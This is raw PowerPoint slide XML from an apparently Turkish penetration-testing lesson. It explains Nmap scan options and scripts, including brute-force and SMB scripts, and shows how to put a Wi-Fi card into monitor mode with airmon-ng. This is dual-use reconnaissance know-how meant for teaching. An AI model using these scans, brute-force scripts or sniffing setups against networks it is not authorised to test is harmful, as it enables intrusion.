                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Servis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>versiyon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tespiti. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> bu işlem için hedef sistem üzerinde keşfedilmek istenen port için bir takım paketler gönderip ardından gelen cevap içerisindeki sürüm bilgisini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-service-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>probe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> dosyasındaki imzalar ile karşılaştırarak karar verir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>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sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> taraması yapılsın, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>port taraması yapılmasın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> seçeneğinin tersidir)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>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sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Betik taraması yapılır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Belirtilen betik/betiklere göre tarama gerçekleştirilir. Ör: –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>snmp-brute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-*, –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/Betikler/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Hızlı tarama</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-PS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: TCP SYN taraması</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-PA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: TCP ACK taraması</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409502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2766F0BF-C2DF-906E-3469-8F4785A51F23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="188686" y="68131"/>
            <a:ext cx="11766335" cy="3509701"/>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BF1D7D59-F621-0D1D-CD4F-B5223F3F62CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="174937" y="3577832"/>
            <a:ext cx="11766335" cy="2208512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Resim 8" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF247CCF-472B-DA16-BE83-6AAC4639B2AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5664200" y="3696973"/>
            <a:ext cx="6290822" cy="1454011"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Resim 10" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F75E0DAE-D707-60C6-E878-FF85D0CD4426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5664200" y="664445"/>
            <a:ext cx="5080000" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Dikdörtgen 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98036DB7-2B31-D320-B58A-1FE7E7E91808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9675628" y="959259"/>
            <a:ext cx="1068572" cy="44423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Dikdörtgen 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4307C705-FEAD-0CA2-A07C-6880FE4AE4CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245534" y="2022601"/>
            <a:ext cx="1092092" cy="5528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5" name="Düz Bağlayıcı 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{111F127F-CDD8-82E8-4877-EAAFCCD43655}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="744279" y="1197845"/>
            <a:ext cx="16055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Dikdörtgen 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AF0E382-F65E-8478-33F3-D04F64DF6024}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785903" y="2400616"/>
            <a:ext cx="4657061" cy="34975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Dikdörtgen 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3285ACB7-0704-0EAC-9FBC-3119B48072CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3633381" y="4976563"/>
            <a:ext cx="2030819" cy="348842"/>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9" name="Düz Ok Bağlayıcısı 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B8E1BB7-D327-0BC6-F3B5-C53EAA807ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2989705" y="2744181"/>
            <a:ext cx="871870" cy="1960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FF152559-16C0-8A5F-6439-AD438D8688EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="174937" y="5863518"/>
            <a:ext cx="11695738" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>iwconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>parametresi ile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> kartlarını görüntülenir. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> kartının monitör </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> da olup olmadığının kontrolü sağlanır. Eğer monitör </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>modda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> değilse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>airmon-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> start wlan0» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>parametresi ile monitör moda geçirilir.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
